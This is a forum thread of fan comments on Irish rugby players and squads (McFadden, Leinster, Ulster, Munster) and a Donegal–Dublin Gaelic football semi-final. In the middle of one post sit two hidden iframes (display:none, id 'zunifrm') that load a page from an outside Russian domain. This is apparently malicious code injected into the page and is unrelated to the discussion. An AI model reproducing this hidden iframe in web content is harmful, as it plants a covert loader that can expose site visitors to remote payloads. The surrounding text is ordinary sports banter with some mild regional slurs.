Feel like I can see both sides to this argument.

McFadden is somewhat pedestrian in some ways. If you're looking for him to break a game, then yes, at the top levels of the game you'll start sweating a little. He hasn't got the sort of super gas, or strength, or footwork, or genius for a line that creates something out of nothing against the very best on a regular level.

He is very effective though. He's got a bit of everything, he's very committed, and he'll keep doing the right things over and over until something gives. There's a reason he's got such a good try return rate at international level and don't give me that malarky about "Oh he's racking them against the soft countries". Most international wingers do that. Should we slag off Earls because nearly half of his international tries came against Fiji, Canada and Russia? Trimble's strike rate would start to look awful if you deduct the ones against Romania, Russia and Namibia.

The position I'd take is that it's pretty cool having McFadden on your team but it's slightly worrying having to elevate him to main man. Given that Madigan and Fitzgerald don't spend as much time on the pitch as they might, I'd say McFadden now looks like being a main man, and that's not great. Leinster really need the conveyor belt to come back to life.

Good weekend for Ulster - beat the ladybois in Tallaght (with no reports of multiple stabbings) and even better, Dún na nGall hammer the jackeens in Croke.

"Stroll to sam" my arse!!<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Uladh abu!!

It's only good when they confirm nothing wrong with Olding...

**** off! :( That was a performance I'd have associated with last decades Dubs. Defence was a shambles.

In fairness it was great to see Donegal play attacking football. They really out thought Dublin and McGuinness showed again why he is a top sports physiologist as well as master tactician. Last weekend and 2 games this weekend were great games. Best 3 in few years in football.

Still 13 men behind the ball stuff. Dublin were naive after building their lead and stopped moving the ball away from Donegal, running at them and playing into their hands. Goals won the game and they stemmed from Dublin's laziness. Sam thrown away in 50 minutes of brainless ****. Jimmy is a class act though, Mayo could make fair use of him.

Its total puke football - but they are still very, very good footballers doing it.

I'd love to see the game played with a 3 man full forward line and 3 man half forward line, but unfortunately everyone is just packing the defense these days. Even us. Although we're ***** at it.

Yeah great group of players, the quality of players they had off the bench matched the Dubs, McBrearty is quite the sub, which is funny considering 'Dublin's bench will win them Sam'. I'll be up for the Nordies in the final anyway, despite James O'Donoghue being my favourite footballer in the country!

I didn't enjoy that match at all, but I gotta say, this is brilliant.

Heard McFadden was one of the best players out of the Leinster lot so fair dues. Hope Olding isn't out for long? That's really unlucky with his first game back. Didn't see the game but he's supposed to have packed on a bit of muscle.

Could Ulster have what Munster had few years ago where they loose a few through injury young and old. Hopefully not.

I hope not. Especially not to Olding. He kind of left us on a cliffhanger the way his form was cut off short.

Munster have very nice back line. Lyons is a fine player and O'Shea will be star in time. Fitzgerald played in preseason games and has looked able for that level. Not fully sure on our front 5 which is a weakness I think in comparison to previous years.

O'Donnell is one of the better tightheads I've come up against.

I expect a Leinster win, it's a very well bablanced team.

Is ok but we've had better in recent years and just as a unit they're weaker than recent years. Our backs are our strong area on this team.

What's with Cleary being on the bench? Thought there was a big noise about him.

Also, how many guys is that Leinster team missing cos of the habit of not playing guys who went to last year's JWC?
